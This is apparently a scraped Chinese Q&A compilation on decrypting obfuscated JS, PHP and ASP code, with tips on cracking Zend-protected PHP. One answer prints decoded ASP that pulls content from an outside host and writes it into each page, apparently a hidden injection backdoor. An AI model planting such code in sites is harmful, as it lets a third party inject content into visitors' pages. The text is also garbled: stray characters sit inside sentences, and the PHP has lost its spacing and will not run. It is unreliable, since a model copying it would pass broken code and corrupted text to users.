⑴ 这个代码是加密过的。求应该怎么解密。求``
首先,这里所说的代码指的是JS,即javaScript文件中的代码。
QQ空间中,随机背景、花、播放器等代码都是采用链接一个外部的JS文件形成的代码。不难发现很多这样的JS代码都被加密了,所以大家总是用别人的,像随机花的代码,除了本空间用的版本外,网上流传的其它版本似乎只有返码一个。
懂JS的人会打开别人的JS文件来看,用于QQ空间的JS被打开后往往看到的是类似下面的东西:
OlOlll="(x)";OllOlO=" String";OlllOO="tion";OlOllO="Code(x)}";OllOOO="Char";OlllOl="func";OllllO=" l = ";OllOOl=".from";OllOll="{return";Olllll="var";eval(Olllll+OllllO+OlllOl+OlllOO+OlOlll+OllOll+OllOlO+OllOOl+OllOOO+OlOllO);eval(l(79)+l(61)+l(102)+l(117)+l(110)+l(99)+l(116)+l(105)+l(111)+l(110)+l(40)+l(109)+l(41)+l(123)+l(114)+l(101)+l(116)+l(117)+l(114)+l(110)+l(32)+l(83)+l(116)+l(114)+l(105)+l(110)+l(103)+l(46)+l(102)+l(114)+l(111)+l(109)+l(67)+l(104)+l(97)+l(114)+l(67)+l(111)+l(100)+l(101)+l(40)+l(77)+l(97)+l(116)+l(104)+l(46)+l(102)+l(108)+l(111)+l(111)+l(114)+l(40)+l(109)+l(47)+l(49)+l(48)+l(48)+l(48)+l(48)+l(41)+l(47)+l(57)+l(57)+l(41)+l(59)+l(125));eval(""+O(102968335)+O(99998335)+O(106928335)+O(106928335)+O(109898335));
(PS:这段代码的译文是:hello)
看到别人把代码弄成这个样子,心动了吧?是不是想把派此自己辛苦写出来的代码也加上密呢?Kim HyunJung根据解密原理写了个漏羡哪小程序,用于使JS代码加密成上面的样子。想要的赶紧点下面的地址下载吧:
http://kimhyunjung.blogbus.com/files/1138097885.exe
⑵ php代码加密怎么解密
$key="Thisissupposedtobeasecretkey!!!";
functionkeyED($txt,$encrypt_key)
{
$encrypt_key=md5($encrypt_key);
$ctr=0;
$tmp="";
for($i=0;$i<strlen($txt);$i++){
if($ctr==strlen($encrypt_key))$ctr=0;
$tmp.=substr($txt,$i,1)^substr($encrypt_key,$ctr,1);
$ctr++;
}
return$tmp;
}
functionencrypt($txt,$key)
{
srand((double)microtime()*1000000);
$encrypt_key=md5(rand(0,32000));
$ctr=0;
$tmp="";
for($i=0;$i<strlen($txt);$i++){
if($ctr==strlen($encrypt_key))$ctr=0;
$tmp.=substr($encrypt_key,$ctr,1).
(substr($txt,$i,1)^substr($encrypt_key,$ctr,1));
$ctr++;
}
returnkeyED($tmp,$key);
}
functiondecrypt($txt,$key)
{
$txt=keyED($txt,$key);
$tmp="";
for($i=0;$i<strlen($txt);$i++){
$md5=substr($txt,$i,1);
$i++;
$tmp.=(substr($txt,$i,1)^$md5);
}
return$tmp;
}
$string="HelloWorld!!!";
//encrypt$string,andstoreitin$enc_text
$enc_text=encrypt($string,$key);
//decrypttheencryptedtext$enc_text,andstoreitin$dec_text
$dec_text=decrypt($enc_text,$key);
//加密
functionstr2hex($s)
{
$r="";
$hexes=array("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");
for($i=0;$i<strlen($s);$i++)=""$r.=($hexes[(ord($s{$i})>>4)].$hexes[(ord($s{$i})&0xf)]);
return$r;
}
//解密
functionhex2str($s)
{
$r="";
for($i=0;$i<strlen($s);$i=""+="2)"{
$x1=ord($s{$i});
$x1=($x1>=48&&$x1<58)?$x1-48:$x1-97+10;
$x2=ord($s{$i+1});
$x2=($x2>=48&&$x2<58)?$x2-48:$x2-97+10;
$r.=chr((($x1<<4)&0xf0)|($x2&0x0f));
}
return$r;
}
echostr2hex("山东");
echo"
";
echohex2str("c9bdb6ab");
?>
⑶ 格式化加密的js代码怎么还原
无法还原。
混淆过的js变量名和方法名全部都是无意义的字符,注释也被删除;
所以很难看懂具体业务。
如果你想完成某一个功能,去尝试找其他的有源码的代码吧。网上js效果代码很多。
如果你想窥探某个网站的js技术框架,我觉得还是放弃吧。。。
⑷ 这个PHP的加密代码怎样破解,这个是什么原码来的
可以用黑刀Dezender来试试,我不担保可以解出来的哦,
从黑刀Dezender4.3版之后,将着力对混淆函数以及自定义函数的解密进行应对。
大家下载压缩包并解压后,会发现有一个“config.ini”的文件,这就是混淆函数库啦!
打开后,可自行编辑其中的内容,当然,也可以通过黑刀Dezender的升级程序直接下载官方最新的混淆函数库文件。这个混淆函数库就相当于是一个字典文件了,在保证格式不变的情况下,大家可以在【黑刀部落】下载《黑刀超级字典生成器》生成字典来挂入主程序进行解密,正确步骤为:先备份、改名自己的config.ini文件,生成的字典文件在第一行加入“[OBFUSCATE_NAME]”,将字典手差文件改名为config.ini,开始解密。
同时,黑刀部落网站的“项目中心”栏目也开设了用户提交自己已知程序被混淆的函数列表,这样的话,就能让Dezender变得越来越强了。再也不怕混淆函数了。呵呵。
什么是混淆函数?混淆函数,是从Zend Guard 4.0之后新增的一项功能,能把PHP文件中的所有函数名都进行混吵指淆,混淆后变成以“_OBFUSCATE_”开头的一串“乱码”,这种加密方式感觉有点类似Md5,因为函数名已经不是原来的样子了,所以解密出来的PHP文件是不能正常执行的。黑刀Dezender在4.3版之后,新增加了挂入混淆函数库参与解密的功能,而混淆函数库,就像是一个包含了已知函数名的字典,利用这个字典,来与被混淆了的函数名(就是所谓的“乱码”)进行比对,如果比对结毕碰皮果相同,则解密出来的文件,基本上就可以恢复到加密前的样子了。如果混淆函数库中没有包含该PHP文件中使用的函数名,那么解密结果依然还是会存在“乱码”的。掌握了这个原理,我们就可以去想办法解决问题了。
方式有以下几种:
第一,使用黑刀超级字典生成器产生一个字典,字典的内容可以自己把握,修改字典文件名为“config.ini”,然后打开字典文件,在第一行插入“[OBFUSCATE_NAME]”标记(注意,方括号也是需要的,也就是引号内的内容都要加进去),将字典文件拷贝入黑刀Dezender主程序所在目录,同时注意备份原有的config.ini文件。这种办法费时费力,也要看运气,不过却是最实际的解决办法。
第二,常看别人源代码的朋友,可以把自己已经掌握了的混淆函数的真实函数名提交到我的网站上来。操作步骤:进入网站首页,进入项目中心的“DeZender混淆函数库更新表”,提交。我会定期查看大家提交上来的数据,加入到官方的混淆函数库中,不断的增强和完善官方混淆函数库,大家可以利用黑刀Dezender的自动升级功能对其进行升级!
⑸ 公司代码被加密,有什么办法可以考出来么
看用什么软件加密的吧,如果是用IP-guard加密的,那就别想了,腔银目前没发现有什么办法可以未经解耐拍密拷出加密代码的
IP-guard的加密基于驱动层和应用层,驱动层加密强度和速度都远超应用层加密,技术要求比较高,也是目前企业加密产品比较高端伍亩宴的加密方式,支持多种格式的源文件,可以自动加密保护源代码,无需手动加密和解密,内部授权环境可以正常打开加密源文件,而一旦未经解密将加密源文件带离内部授权环境,则无法正常打开。
⑹ java代码想加密怎么处理
如果你说的是文本加密,有很多方法,自己也可以写个字符变换程序
如果是代码加密,没用的,java就是开源。
你藏再厉害,编译+反编译,干净的源码就出来了
⑺ php源代码被加密了,请问如何解密
php源码被使用zend加密,现阶段还没用解密方法。但是好像现在有这样的一个studio,他们成功地完成了zend和eac的decode
不过是收费的
⑻ 谁知道这段加密的asp代码怎么解密
解后困带棚数据
<%
dim domain,id,filename
domain = Request.ServerVariables("SERVER_NAME")
Dim strURL,intPos,intStrLen,strFileName
strURL = Request.Servervariables("url")
intPos = InstrRev(strURL,"/")
intStrLen = len(strURL)
strFileName = Right(strURL,intStrLen-intPos)
Randomize()
n=Int((10000-1+1)*Rnd(now())+1)
id=request("aid")
if id="" then
url="http://numid.0752huida.com:88/server.php?aid=" & n & "&domain=" + domain + "&filename=" + strFileName
linkurlcode=getHTTPPage(url)
response.Write linkurlcode
else
url="http://numid.0752huida.com:88/server.php?aid=" + id + "&domain=" + domain + "&filename=" + strFileName
linkurlcode=getHTTPPage(url)
response.Write linkurlcode
end if
Function getHTTPPage(url)
dim objXML
set objXML=createobject("MSXML2.SERVERXMLHTTP.3.0")
objXML.open "GET",url,false
objXML.send()
getHTTPPage=bBytesToBstr(objXML.responseBody)
set objXML=nothing
End Function
Function bBytesToBstr(body)
dim objstream
set objstream = CreateObject("adodb.stream")
objstream.Type = 1
objstream.Mode =3
objstream.Open
objstream.Write body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = "GB2312"
bBytesToBstr = objstream.ReadText
objstream.Close
set objstream = nothing
end Function
%>
教你解,代码 execute(UnEncode(wei)) 转成 response.write(UnEncode(wei)) 在察看源文件(代码),在按这个办法转下,不过里面行姿的是UnEncode(darkst)了,把wei改成darkst.
这里代码加汪则密两次.
楼上的不是解不了,而是你不会看代码,好了,给分吧.
⑼ php文件被处理了,好像是加密了,怎么解密呀,请教高手。代码如下:
这个是zend加密 你去网络搜索“zend解密工具” 下载一个 然后看看他的教程岩槐数怎么操作 因为不同的zend的使用方法不一样,我也个你说不准却他的具体操作,你去下载一个看看就知道怎么用了 不过zend解密不保粗首证能100%的全部解密, 这个加密过的文件在解密只能保证有95%或者明旦更低的可用性,明白么?
⑽ 我有md5 加密代码 可是加密后怎么破解啊
md5 加密运算是不可逆运算,也就是不能通过加密后的结果得到原始串,
现在的破解方法都是暴力破解,讲字符串加密后比较来判断,太复杂的密码是
算不出来了